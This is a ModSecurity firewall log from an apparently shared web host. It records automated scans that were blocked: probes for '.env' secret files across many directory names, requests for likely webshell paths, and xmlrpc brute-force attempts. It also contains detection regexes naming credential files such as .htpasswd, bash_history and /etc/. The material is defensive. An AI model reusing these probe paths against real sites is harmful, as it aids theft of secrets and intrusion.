[Tue May 26 16:29:30.373812 2026] [security2:error] [pid 808625:tid 808822] [client 192.3.106.247:33172] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9EjEl_SBaWibfDmpDIgAAAEM"]
[Tue May 26 16:29:30.373872 2026] [security2:error] [pid 808625:tid 808822] [client 192.3.106.247:33172] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9EjEl_SBaWibfDmpDIgAAAEM"]
[Tue May 26 16:29:30.975993 2026] [security2:error] [pid 808625:tid 808773] [client 92.118.39.194:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/api/dev/.env"] [unique_id "ahV9EjEl_SBaWibfDmpDQAAAABI"]
[Tue May 26 16:29:31.134199 2026] [security2:error] [pid 808625:tid 808863] [client 92.118.39.194:5370] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/api/beta/.env"] [unique_id "ahV9EzEl_SBaWibfDmpDSAAAAGw"]
[Tue May 26 16:29:31.186817 2026] [security2:error] [pid 808625:tid 808815] [client 173.239.254.139:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahV9EDEl_SBaWibfDmpC9gAAPBQ"]
[Tue May 26 16:29:31.316669 2026] [security2:error] [pid 808625:tid 808859] [client 40.83.92.30:5777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV9EzEl_SBaWibfDmpDSQAAAGg"]
[Tue May 26 16:29:31.316851 2026] [security2:error] [pid 808625:tid 808859] [client 40.83.92.30:5777] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV9EzEl_SBaWibfDmpDSQAAAGg"]
[Tue May 26 16:29:31.767362 2026] [security2:error] [pid 808625:tid 808759] [client 92.118.39.194:5386] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/beta/.env"] [unique_id "ahV9EzEl_SBaWibfDmpDVgAAAAQ"]
[Tue May 26 16:29:32.013278 2026] [security2:error] [pid 808625:tid 808762] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9EzEl_SBaWibfDmpDTwAAAAc"]
[Tue May 26 16:29:32.105506 2026] [security2:error] [pid 808625:tid 808865] [client 40.83.92.30:6117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/admin.php"] [unique_id "ahV9FDEl_SBaWibfDmpDYAAAAG4"]
[Tue May 26 16:29:32.105607 2026] [security2:error] [pid 808625:tid 808865] [client 40.83.92.30:6117] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/admin.php"] [unique_id "ahV9FDEl_SBaWibfDmpDYAAAAG4"]
[Tue May 26 16:29:32.181125 2026] [security2:error] [pid 808625:tid 808809] [client 92.118.39.194:5412] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/staging/.env"] [unique_id "ahV9FDEl_SBaWibfDmpDYwAAADY"]
[Tue May 26 16:29:32.181427 2026] [security2:error] [pid 808625:tid 808877] [client 92.118.39.194:5396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/stage/.env"] [unique_id "ahV9FDEl_SBaWibfDmpDZAAAAHo"]
[Tue May 26 16:29:32.457498 2026] [security2:error] [pid 808625:tid 808765] [client 92.118.39.194:5414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/testing/.env"] [unique_id "ahV9FDEl_SBaWibfDmpDaAAAAAo"]
[Tue May 26 16:29:32.596248 2026] [security2:error] [pid 808625:tid 808853] [client 92.118.39.194:5422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/development/.env"] [unique_id "ahV9FDEl_SBaWibfDmpDaQAAAGI"]
[Tue May 26 16:29:32.638770 2026] [security2:error] [pid 808625:tid 808766] [client 40.83.92.30:6106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/inputs.php"] [unique_id "ahV9FDEl_SBaWibfDmpDawAAAAs"]
[Tue May 26 16:29:32.638858 2026] [security2:error] [pid 808625:tid 808766] [client 40.83.92.30:6106] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/inputs.php"] [unique_id "ahV9FDEl_SBaWibfDmpDawAAAAs"]
[Tue May 26 16:29:32.658066 2026] [security2:error] [pid 808625:tid 808778] [client 92.118.39.194:5306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/develop/.env"] [unique_id "ahV9FDEl_SBaWibfDmpDbgAAABc"]
[Tue May 26 16:29:33.126711 2026] [security2:error] [pid 808625:tid 808808] [client 92.118.39.194:5436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/docker/.env"] [unique_id "ahV9FTEl_SBaWibfDmpDewAAADU"]
[Tue May 26 16:29:33.146177 2026] [security2:error] [pid 808625:tid 808756] [client 92.118.39.194:5444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/docker-compose/.env"] [unique_id "ahV9FTEl_SBaWibfDmpDfAAAAAE"]
[Tue May 26 16:29:33.184100 2026] [security2:error] [pid 808625:tid 808830] [client 92.118.39.194:5324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/root/.env"] [unique_id "ahV9FTEl_SBaWibfDmpDgAAAAEs"]
[Tue May 26 16:29:33.209942 2026] [security2:error] [pid 808625:tid 808807] [client 40.83.92.30:6081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/file.php"] [unique_id "ahV9FTEl_SBaWibfDmpDgQAAADQ"]
[Tue May 26 16:29:33.210061 2026] [security2:error] [pid 808625:tid 808807] [client 40.83.92.30:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/file.php"] [unique_id "ahV9FTEl_SBaWibfDmpDgQAAADQ"]
[Tue May 26 16:29:33.240038 2026] [security2:error] [pid 808625:tid 808818] [client 95.164.245.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9FTEl_SBaWibfDmpDfwAAAD8"], referer: https://www.anujtradingco.com/
[Tue May 26 16:29:33.479989 2026] [security2:error] [pid 808625:tid 808864] [client 92.118.39.194:5484] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/site/.env"] [unique_id "ahV9FTEl_SBaWibfDmpDhwAAAG0"]
[Tue May 26 16:29:33.586959 2026] [security2:error] [pid 808625:tid 808666] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV9FTEl_SBaWibfDmpDiwAAVSg"]
[Tue May 26 16:29:33.587125 2026] [security2:error] [pid 808625:tid 808840] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV9FTEl_SBaWibfDmpDiwAAVSg"]
[Tue May 26 16:29:33.876727 2026] [security2:error] [pid 808625:tid 808811] [client 40.83.92.30:5773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/ms-edit.php"] [unique_id "ahV9FTEl_SBaWibfDmpDkQAAADg"]
[Tue May 26 16:29:33.876837 2026] [security2:error] [pid 808625:tid 808811] [client 40.83.92.30:5773] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/ms-edit.php"] [unique_id "ahV9FTEl_SBaWibfDmpDkQAAADg"]
[Tue May 26 16:29:33.938728 2026] [security2:error] [pid 808625:tid 808782] [client 92.118.39.194:5338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/panel/.env"] [unique_id "ahV9FTEl_SBaWibfDmpDkgAAABs"]
[Tue May 26 16:29:34.467364 2026] [security2:error] [pid 808625:tid 808820] [client 95.164.245.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9FjEl_SBaWibfDmpDngAAAEE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 16:29:34.547824 2026] [security2:error] [pid 808625:tid 808810] [client 92.118.39.194:5346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/console/.env"] [unique_id "ahV9FjEl_SBaWibfDmpDpQAAADc"]
[Tue May 26 16:29:34.631016 2026] [security2:error] [pid 808625:tid 808872] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9FjEl_SBaWibfDmpDmQAAAHU"]
[Tue May 26 16:29:34.693305 2026] [security2:error] [pid 808625:tid 808833] [client 40.83.92.30:5775] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/simple.php"] [unique_id "ahV9FjEl_SBaWibfDmpDqwAAAE4"]
[Tue May 26 16:29:34.693399 2026] [security2:error] [pid 808625:tid 808833] [client 40.83.92.30:5775] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/simple.php"] [unique_id "ahV9FjEl_SBaWibfDmpDqwAAAE4"]
[Tue May 26 16:29:34.766546 2026] [security2:error] [pid 808625:tid 808827] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9FjEl_SBaWibfDmpDmwAAAEg"]
[Tue May 26 16:29:34.867845 2026] [security2:error] [pid 808625:tid 808825] [client 85.208.96.193:40750] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahV9FjEl_SBaWibfDmpDsAAAAEY"]
[Tue May 26 16:29:34.868038 2026] [security2:error] [pid 808625:tid 808825] [client 85.208.96.193:40750] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahV9FjEl_SBaWibfDmpDsAAAAEY"]
[Tue May 26 16:29:34.927961 2026] [security2:error] [pid 808625:tid 808798] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9FjEl_SBaWibfDmpDrwAAACs"]
[Tue May 26 16:29:35.437908 2026] [security2:error] [pid 808625:tid 808791] [client 40.83.92.30:6082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/bgymj.php"] [unique_id "ahV9FzEl_SBaWibfDmpDvgAAACQ"]
[Tue May 26 16:29:35.438084 2026] [security2:error] [pid 808625:tid 808791] [client 40.83.92.30:6082] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/bgymj.php"] [unique_id "ahV9FzEl_SBaWibfDmpDvgAAACQ"]
[Tue May 26 16:29:35.571995 2026] [security2:error] [pid 808625:tid 808832] [client 192.3.106.247:33176] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9FzEl_SBaWibfDmpDwgAAAE0"]
[Tue May 26 16:29:35.697232 2026] [security2:error] [pid 808625:tid 808832] [client 192.3.106.247:33176] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9FzEl_SBaWibfDmpDwgAAAE0"]
[Tue May 26 16:29:36.300754 2026] [security2:error] [pid 808625:tid 808787] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9FzEl_SBaWibfDmpDwQAAACA"]
[Tue May 26 16:29:36.569138 2026] [security2:error] [pid 808625:tid 808839] [client 40.83.92.30:6099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahV9GDEl_SBaWibfDmpD2AAAAFQ"]
[Tue May 26 16:29:36.569246 2026] [security2:error] [pid 808625:tid 808839] [client 40.83.92.30:6099] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahV9GDEl_SBaWibfDmpD2AAAAFQ"]
[Tue May 26 16:29:36.682878 2026] [security2:error] [pid 808625:tid 808770] [client 92.118.39.194:18450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/sql/.env"] [unique_id "ahV9GDEl_SBaWibfDmpD3AAAAA8"]
[Tue May 26 16:29:37.145313 2026] [security2:error] [pid 808625:tid 808863] [client 92.118.39.194:18470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/temp/.env"] [unique_id "ahV9GTEl_SBaWibfDmpD4AAAAGw"]
[Tue May 26 16:29:37.194526 2026] [security2:error] [pid 808625:tid 808873] [client 176.65.139.234:29196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grcorp.moes-art.com"] [uri "/.env"] [unique_id "ahV9GTEl_SBaWibfDmpD4QAAAHY"]
[Tue May 26 16:29:37.274556 2026] [security2:error] [pid 808625:tid 808778] [client 95.164.245.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9GTEl_SBaWibfDmpD5AAAABc"], referer: https://anujtradingco.com
[Tue May 26 16:29:37.316142 2026] [security2:error] [pid 808625:tid 808767] [client 40.83.92.30:6129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/404.php"] [unique_id "ahV9GTEl_SBaWibfDmpD6wAAAAw"]
[Tue May 26 16:29:37.316261 2026] [security2:error] [pid 808625:tid 808767] [client 40.83.92.30:6129] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/404.php"] [unique_id "ahV9GTEl_SBaWibfDmpD6wAAAAw"]
